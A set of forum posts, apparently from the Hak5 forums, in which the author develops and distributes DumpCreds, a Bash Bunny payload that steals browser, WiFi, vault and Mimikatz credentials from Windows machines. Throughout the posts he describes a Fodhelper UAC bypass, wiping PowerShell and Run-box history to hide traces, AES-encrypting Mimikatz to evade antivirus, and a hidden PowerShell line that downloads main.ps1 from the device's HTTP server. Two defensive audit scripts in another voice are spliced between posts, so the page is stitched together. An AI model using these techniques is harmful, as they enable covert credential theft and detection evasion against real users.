
qdba
Active Members - Posts: 87 - Days Won: 2

Everything posted by qdba

  1. Maybe a virus scanner. lazagne.exe was mostly caught by AV.
  2. Added multiple UAC modes. Set the variable UAC_MODE in payload.txt:
     UAC_MODE=1 # Fodhelper UAC
     UAC_MODE=0 # Standard UAC mode
     Just beta (works on my Windows 10, not tested on 7 yet).
  3. OK.... Some new changes (beta state). Better cleanup:
     - remove all changes in PowerShell history
     - remove all changes in RunMRU (not only delete the files)
     https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  4. I must check if the command for switching off the history is still in the history file after execution. Can't do it now, I have no PowerShell here. The result gives me the route for the rest.
  5. It cannot be done in the line with the main.ps1 call because...... .......
     A first PowerShell task will be started for the input of the registry command for the UAC bypass. Then fodhelper opens a second PowerShell task in admin mode. The first PowerShell task can be closed after the fodhelper thing. The string Q STRING "powershell -exec bypass -W HIDDEN \"while (1) { If (Test-Connection 172........ will be "quacked" in the second PS task. A third PS task is opening, waiting for the HTTP server to come up, and downloads main.ps1. The second task is closed with the "exit" at the end of the main.ps1 line. If you remove the history between the main.ps1 call and the exit command it's too fast: main.ps1 is still running and creates new history events. main.ps1 is ready when the EOF file was created in the loot dir (payload.txt: line 95). The computer can be cleaned after this event. So...
     1. The history must be switched off at the very first beginning, before the registry command of the UAC bypass. Considerations: does the Set-PSReadlineOption -HistorySaveStyle SaveNothing command switch off the history globally? If so ... good... if not, set a marker in the history file.
     2. Do all the stuff.....
     3. Problem.... Switch the history on after the EOF will be written. Maybe it can be done by switching ATTACKMODE to HID and doing all the things in a GUI (r ?), or by starting a DOS command line at the end of main.ps1 which does all the cleanup (switch on command line, kill powershell, copy back a saved history file, delete all lines from marker to end or.... / and... other things). Will sleep after that..
  6. Got it ... With Set-PSReadlineOption -HistorySaveStyle SaveNothing the history saving in PowerShell will be switched off. So I set it at the beginning of the script and delete the history file at the end.
  7. Q GUI didn't work for me. Q GUI r does. Now we have only the taskkill powershell command in the PowerShell history.
  8. Code for clearing "Run" history was already in main.ps1:
     # Empty Run input field (Win+R history)
     Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
     Added the code to clear PowerShell history to main.ps1. We should avoid too many "Q GUI r" commands, because it's visible.
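The posts above walk through three host-side traces the payload tries to remove: the PSReadLine history file, the RunMRU (Win+R) list, and the registry handler the Fodhelper UAC bypass registers. The following audit script is an added example written for this page; it is not part of DumpCreds or of any of the posts, and it is meant for the other side of a demo like this: confirming on the target what was left behind. It assumes PSReadLine is available in the session being inspected (it is loaded by default on Windows 10), and that the Fodhelper technique linked later in the thread uses the per-user ms-settings protocol handler key, which is the key it checks.

```powershell
# Added example, not from the DumpCreds payload: report the artifacts the
# cleanup discussed above is supposed to remove, so a defender (or the person
# running the demo) can verify the host state afterwards.
function Get-PayloadArtifactReport {
    [CmdletBinding()]
    param()

    # 1. PSReadLine history. "SaveNothing" means nothing is written to disk;
    #    "SaveIncrementally" is the default on Windows 10.
    $histStyle = $null
    $histPath  = $null
    $histLines = 0
    if (Get-Module -ListAvailable -Name PSReadLine) {
        Import-Module PSReadLine -ErrorAction SilentlyContinue
        $opt       = Get-PSReadLineOption
        $histStyle = [string]$opt.HistorySaveStyle
        $histPath  = $opt.HistorySavePath
        if ($histPath -and (Test-Path -LiteralPath $histPath)) {
            $histLines = (Get-Content -LiteralPath $histPath | Measure-Object -Line).Lines
        }
    }

    # 2. RunMRU: the Win+R history. After the cleanup in main.ps1 this should be empty.
    #    Get-ItemProperty adds PS* note properties; MRUList is the ordering index.
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    $runMru = @()
    if (Test-Path -LiteralPath $runKey) {
        $runMru = @((Get-ItemProperty -LiteralPath $runKey).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^(MRUList|PS.*)$' } |
            ForEach-Object { $_.Value })
    }

    # 3. Fodhelper hijack key (assumption: this is the key the referenced
    #    FodhelperBypass.ps1 writes). It does not exist on a clean host, so its
    #    mere presence is a strong indicator; DelegateExecute alongside it even more so.
    $fodKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
    $fodCmd = $null
    $fodDelegate = $false
    if (Test-Path -LiteralPath $fodKey) {
        $props       = Get-ItemProperty -LiteralPath $fodKey
        $fodCmd      = $props.'(default)'
        $fodDelegate = $null -ne $props.PSObject.Properties['DelegateExecute']
    }

    [PSCustomObject]@{
        HistorySaveStyle     = $histStyle
        HistoryFile          = $histPath
        HistoryLineCount     = $histLines
        RunMruEntries        = $runMru
        FodhelperKeyExists   = (Test-Path -LiteralPath $fodKey)
        FodhelperCommand     = $fodCmd
        FodhelperDelegateSet = $fodDelegate
    }
}

Get-PayloadArtifactReport | Format-List
```

Run it in a fresh console after the payload has finished: an empty RunMruEntries list and a missing ms-settings key are what the cleanup aims for, while a HistorySaveStyle of SaveNothing in a new session would itself be a visible change, since the option is per session and resets to the default when PowerShell restarts.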
  9. Which version of DumpCreds do you use? The newest is 2.3. You can download it here: https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
  10. Updated the repo so hak5 could merge it to the master branch. Changed version to 2.3. Added taskkill /F /IM powershell.exe at the end of main.ps1.
  11. I merged your patch to the master branch. Did some patches so fodhelper starts hidden. https://github.com/qdba/bashbunny-payloads/blob/master/payloads/library/credentials/DumpCreds/payload.txt
  12. @PoSHMagiC0de Thank you for your opinion and suggestion. I give you 100%, writing scripts in function format is not so bad. But... ... When I started writing DumpCreds and other scripts for the BB, I hadn't done anything before with PowerShell. Not even a "Hello World". So I'm fighting a lot with the PowerShell syntax and some effects I did not expect:
     - output lines are truncated
     - piping directly to a file on BB's smbserver.py did not work
     - when I pipe the output to variables, CRs and LFs vanish
     - no idea how to start functions in the background
     I'm CIO and CSIO at 3 different companies with roughly 350 workstations, 30 servers, 120 printers. My team (2 other guys) and I do everything you can imagine in IT: from installing and configuring firewalls, switches and routers, SAN, NAS, over 1st, 2nd, 3rd level support for the employees in Office and Windows, communication, managing and configuring the 30 Postfix, Exchange, Samba, HTTP, Secmail, file, ..... servers, supporting and customizing SAP (MM, PP, Base, WM, user rights management), writing reports and scripts in ABAP, Perl, Bash, DOS, VB, VBA, QlikView, and so on..... 3 persons for the whole IT stuff with little help from outside. I need DumpCreds and an Excel doc with encrypted Meterpreter shellcode for a live hacking demo during the training to raise the awareness of our employees in IT security. I will sensitize them. As I did it, it was the fastest and most effective way for me to learn PowerShell and program that script. At the moment I have no time to take care of a well-written script. Maybe I will do it in version 3.0. (And I will remove my modifications from the used Empire scripts in 3.0.) I did the encryption thing because every time I plugged in the BB in arming or storage mode for developing or trying another payload, my AV deleted Empire's Mimikatz.ps1 script. A simple obfuscation didn't help a lot. First I wanted to do it with base64 encoding and compression.
     But during my work with the Excel doc, the base64-encoded Meterpreter shellcode was detected by my AV scanners. I think one day AV scanners will detect the encoded Mimikatz script, especially since I publish the script in the forum. If so, it's very easy to hide the script once more: only change the password and/or salt, encode it again with https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles and that's it. That's the idea behind all...
  13. 1. Do you set the IP of the Remote NDIS driver on your computer manually, or have you enabled ICS sharing? The command GET TARGET_IP only works if your Remote NDIS driver is set to DHCP. 2. If you have admin rights on your computer (the UAC is working), the script is set to AdminMode=True. If you have no admin rights, it doesn't make sense to run mimikatz or hashdump, because this works only if you have admin rights. So AdminMode only shows whether you have admin rights ($true) or not ($false).
  14. @PoSHMagiC0de Thanks for your comment. This comes from not searching enough. But now there are 2 scripts for encrypting code. This helps to hide some code from detection by AV. I just started with PowerShell scripting, so it was good for learning.
  15. EncDecFiles.ps1
     Author: (c) 2017 by QDBA
     Version 1.0
     Description
     EncDecFiles.ps1 is a PowerShell script to encrypt / decrypt a PowerShell (or any other) file with AES. You can use it to obfuscate your PowerShell script so AV scanners don't detect it.
     Usage:
     EncDecFiles.ps1 < -Encrypt | -Decrypt >   # encrypt or decrypt a file
                     < -In Filename >          # input file
                     [ -Out Filename ]         # output file
                     [ -Pass Password ]        # password
     Example 1 - encdecfiles.ps1 -In c:\test.ps1 -encrypt
       Encrypts file c:\test.ps1 with password "hak5bunny"; encrypted file is c:\test.enc
     Example 2 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -pass secret
       Encrypts file c:\test.ps1 with password "secret"; encrypted file is c:\test.enc
     Example 3 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -Out c:\encrypted-file.aes -pass Secret
       Encrypts file c:\Test.ps1 with password "Secret"; encrypted file is c:\encrypted-file.aes
     Example 4 - encdecfiles.ps1 -In c:\Test.enc -decrypt
       Decrypts the encrypted file c:\test1.enc to c:\test1.ps1 with default password "hak5bunny"
     How to run the encrypted PowerShell script
     In the script "Run_Script_Example.ps1" you see an example of how to load and execute the encrypted script: load the encrypted script into a variable, then execute the function Run with the variable and a password.
     Download https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles
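Encrypting a script on disk, as EncDecFiles.ps1 does, only changes what an on-access scanner sees in the file; once Run_Script_Example.ps1 has decrypted the text and handed it to the PowerShell engine, the engine itself can record the plaintext. With script block logging enabled, Windows PowerShell 5.x writes the de-obfuscated script block to the Microsoft-Windows-PowerShell/Operational log as event 4104, and since PowerShell 5.0 it logs blocks containing certain suspicious terms at warning level even without the policy. The check below is an added example for this page, not code from EncDecFiles, DumpCreds or any post in the thread. It assumes the caller can read that event log and that the policy value EnableScriptBlockLogging under the standard ScriptBlockLogging policy key is where the setting lives; the search terms passed to it are placeholders chosen by the caller.

```powershell
# Added example, not from EncDecFiles or DumpCreds: find out whether a script
# that was decrypted and executed in memory still ended up in the PowerShell
# script block log (event 4104), and whether that logging is switched on.

function Test-ScriptBlockLoggingEnabled {
    # Policy location for "Turn on PowerShell Script Block Logging".
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path -LiteralPath $key)) { return $false }
    $value = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    return ($value -eq 1)
}

function Find-LoggedScriptBlock {
    [CmdletBinding()]
    param(
        # Literal strings to look for in logged script text, e.g. 'Invoke-Mimikatz', 'sekurlsa'.
        [Parameter(Mandatory)][string[]]$Pattern,
        [datetime]$Since = (Get-Date).AddHours(-1)
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }

    # Event 4104 payload order: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        foreach ($p in $Pattern) {
            if ($text -match [regex]::Escape($p)) {
                [PSCustomObject]@{
                    Time          = $_.TimeCreated
                    Level         = $_.LevelDisplayName
                    ScriptBlockId = $_.Properties[3].Value
                    Path          = $_.Properties[4].Value   # empty for in-memory blocks
                    Match         = $p
                    Excerpt       = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
                break   # one hit per event is enough
            }
        }
    }
}

"Script block logging policy enabled: $(Test-ScriptBlockLoggingEnabled)"
Find-LoggedScriptBlock -Pattern 'Invoke-Mimikatz', 'sekurlsa' | Format-Table -AutoSize
```

An empty Path column on a hit is the tell-tale of the loader pattern described in this post: the block was executed from a string rather than from a file, yet its full text is on disk in the event log. Large scripts are split across several 4104 events (MessageNumber of MessageTotal), so a term near the end of a long script shows up in a later fragment sharing the same ScriptBlockId.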
  16. The payload is doing that. Just change Q ALT j to Q ALT y in payload.txt. It's because I'm on German language.
  17. - smbserver stuff removed
     - handshake removed
     - HTTP server added (download PowerShell scripts, upload loot)
     - Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-m1m1d0gz.enc. Not really necessary, but if you are in storage mode the AV doesn't remove it.
     - all in all a little bit faster
     - removed the debug code
     - recoded Get-WiFiCreds.ps1 for working on Windows 7
  18. DumpCreds 2.3.3
     Author: QDBA
     Version: Version 2.3.1 Build 1013
     Target: Windows 7, 10
     Description
     ** !!!!! works only on Bash Bunny with FW 1.1+ !!!!! **
     Dumps the usernames & plaintext passwords from:
     - Browsers (Chrome, Firefox)
     - WiFi creds
     - SAM hashes (only if AdminMode=True)
     - Mimimk@tz dump (only if AdminMode=True)
     - Computer information (hardware info, Windows product key, hotfixes, software, local and AD user list)
     without use of:
     - USB storage (because USB storage is mostly blocked by USBGuard or DriveLock)
     - Internet connection (because the firewall content filter blocks the download sites)
     Problems
     If you use the payload on a computer for the first time, it will take some time and tries until the drivers are successfully loaded. If the payload doesn't work (red LED or yellow LED blinks 2 or 4 times), unplug the BB and try once more (can take 3 or 4 times).
     If the payload stops working (yellow LED blinks very fast or triples longer than 2 min) and you get no white LED, you ran into a timeout. If you plug in the BB, every payload has 1 min 30 s for doing the job. At 1 min 30 s every payload stops. (That's a FW 1.1 issue.)
     Don't use a static IP on the target computer. (GET TARGET_IP works only if DHCP is used.)
     Configuration
     None.
     Requirements
     If you have another language than US, install it according to the Bash Bunny documentation.
     Download
     https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds
     Install
     - Put Bash Bunny in arming mode
     - Change DUCKY_LANG in config.txt or payload.txt if needed
     - Edit Get-WifiCreds.ps1 and change the ".... | Select-String -Pattern" entries to your language if other than "de" or "us"
     - Copy all files and folders in GitHub's DumpCreds folder to your favorite switch folder
     - Eject Bash Bunny safely!!
     - Move the switch into the right position if necessary
     - Set UAC mode in payload.txt (1 = Fodhelper UAC (Win 10 only), 0 = Standard UAC (Win 7 + Win 10))
     - Plug in Bash Bunny and have fun....! :-)
     STATUS LED
     Magenta solid        Setup
     Red fast blink       Target did not acquire IP address
     Yellow single blink  Initialization
     Yellow double blink  HID stage
     Yellow very fast     Wait for IP coming up, run PowerShell scripts
     White                Cleanup, copy files to /loot
     Green                Finished
     Discussion
     https://forums.hak5.org/index.php?/topic/40806-payload-new-dumpcreds-22/
     Credits
     Special thx to illwill & tux for the server.py (HTTP_Server)
     https://github.com/EmpireProject/Empire (Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1, dumpCredStore.ps1)
     Valentin-Metz for inserting the Fodhelper UAC bypass (Resource: https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1)
     Changelog
     Version 2.3.3
     [Build 1013] Minor changes. Encode Invoke-PowerDump because it was caught by AV. Add dumpCredStore; dumps credentials from Vault
     Version 2.3.2
     [Build 1012] Multiple UAC modes: 1 = Fodhelper; 0 = Standard UAC
     [Build 1011] Undo all changes in RunMRU and PowerShell history
     Version 2.3.1
     [Build 1009] Merged the UAC bypass fodhelper changes from valentin-metz
     Version 2.2
     [Build 1008] Removed DUCKY_LANG from payload.txt because it is set in config.txt [FW 1.2].
     [Build 1007] Some errors fixed with char encoding and encrypted PS payloads in Windows 7
     [Build 1006] smbserver stuff removed; handshake removed; HTTP server added (download PowerShell scripts, upload loot); Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-M1m1d0gz.enc (not really necessary, but if you are in storage mode the AV doesn't remove it :-)); all in all a little bit faster; removed the debug code; recoded Get-WiFiCreds.ps1 for working on Windows 7
     Version 2.1
     [Build 1007] Some errors fixed with char encoding and encrypted PS payloads in Windows 7
     [Build 1006] smbserver stuff removed; handshake removed; HTTP server added (download PowerShell scripts, upload loot); Invoke-m1m1d0gz.ps1 AES encrypted to Invoke-M1m1d0gz.enc (not really necessary, but if you are in storage mode the AV doesn't remove it :-)); all in all a little bit faster; removed the debug code; recoded Get-WiFiCreds.ps1 for working on Windows 7
     Version 2.1
     Complete new payload.txt code for Bash Bunny 1.1. Added a lot of debug code into the payload. Universal payload: never mind if you are admin (with UAC prompt) or not (with credentials prompt), the payload works anyway.
  19. 2.2 is heavily under development and not ready for use.
     - payload not ready
     - main.ps1 50% ready
     - all PowerShell files are AES encoded; they will be decoded directly into memory so AV scanners don't detect them too fast
     - encode/decode script ready
     Please wait a few days until all is working fine.